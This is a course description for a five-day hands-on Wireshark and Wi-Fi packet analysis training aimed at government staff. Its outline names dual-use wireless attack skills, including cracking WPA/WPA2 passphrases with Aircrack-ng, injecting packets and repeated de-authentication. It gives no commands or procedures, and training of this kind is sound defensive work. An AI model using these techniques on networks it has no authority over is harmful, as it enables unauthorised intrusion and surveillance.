Duration:

5 Days

Audience:

Employees of federal, state and local governments; and businesses working with the government.

Course Overview:

In this hands-on course, you will receive in-depth training on Wireshark® and WiFi communications analysis. You will develop the skills to capture, decrypt and analyze wireless packets. The student will walk away with  a set of analysis techniques focusing on the use of vendor-neutral, open source tools.

Who Needs to Attend

Wireless network engineers and Ethernet network engineers with basic- to intermediate-level general networking knowledge looking to add wireless capabilities to an existing network

Prerequisites

  • Familiarity with TCP/IP networking, Wi-Fi fundamentals, and network infrastructure devices such as switches, routers, etc.

Course Outline

Wireshark

  • Perform unattended captures with auto-stop conditions
  • Apply a decryption key to reveal upper layer protocols for analysis
    • Verify the key decrypted traffic
    • Troubleshooting steps if decryption is unsuccessful
  • Capture and Display filter syntax
  •  Statistics and graphs
  • Filter on addresses, protocols, fields or traffic characteristics
  • Filter on keywords using wildcards and regular expressions
  • Reassemble and extract files from captured traffic
  • Dissect and fix malformed packets

Command Line Tools

  • Aircrack-ng Suite
    • Switch the capture adapter into monitor mode with Airmon-ng
    • Capture with Airodump-ng
    • Crack WPA/WPA2 passphrase keys with Aircrack-ng
    • Inject packets with Aireplay-ng
  • Capinfos
  • Dumpcap
  • Editcap
  • Mergecap
    • How to merge pcaps of a similar file type; cap, pcap, pcappi, pcapng, and kismet
  • Reodercap
    • Reordering EAPOL handshakes
  • Tcpdump
    • Filter on large pcaps
  • Tshark
    • Streamline analysis especially for large pcaps
    • Traffic analysis to perform network mapping of access points of interest and associated clients given a large pcap
    • Extracting packets for specific MAC/BSSID/SSID/etc to a smaller file for analysis
  • Nmap

802.11 Capture and Analysis

  • 802.11 Operation Modes
    • Device-to-Device (Adhoc) Communication
    • Basic Service Set (BSS)
    • Basic Service Set Identifier (BSSID)
    • Extended Basic Service Set (ESSID)
  • 802.11 MAC Layer Frame Types
    • Management
    • Control
    • Data
  • 802.11 MAC Layer Frame Formats
    • Frame Control
    • To/From DS
    • Addresses
    • Filter random MAC addresses
  • 802.11 Address Types
    • Transmitter vs. Source Address
    • Receiver vs Destination Address
  • 802.11 Operation and Frame Exchanges
    • Beacons
    • Probe Request/Response
    • Authentication/ACK
    • Association Request/Response

802.11 Security

  • WLAN Discovery Techniques
    • Use Wireshark WLAN Statistics to correlate MACs to BSSIDs, and BSSIDs to SSIDs
    • How certain traffic appears coming across the network
      • De-authing repeatedly
      • Nmap scans
  • 802.11 Authentication and Key Exchange
    • 802.1X/EAP exchanges
      • Pre-Shared Key authentication
      • Four-way handshake
      • Group key exchange
  • Compare encrypted vs decrypted traffic – What can be gained from each

Decrypted Protocol Analysis

  • Understanding the value of:
    • User agent strings
    • Port numbers
    • Public vs private addresses
  • Understanding what can be gained from:
    • ARP & ARP Requests
    • DHCP
    • TCP
    • HTTP
    • TLS
The course concludes with a Capture the Flag (CTF)  exercise on extracting files, pictures, videos, etc.

Hardware used in class:

Alfa WLAN adapters are included to provide a consistent, expected level of performance from the tools you utilize. We regularly evaluate the various WLAN adapter model in the marketplace and always provide the most versatile and best supported hardware.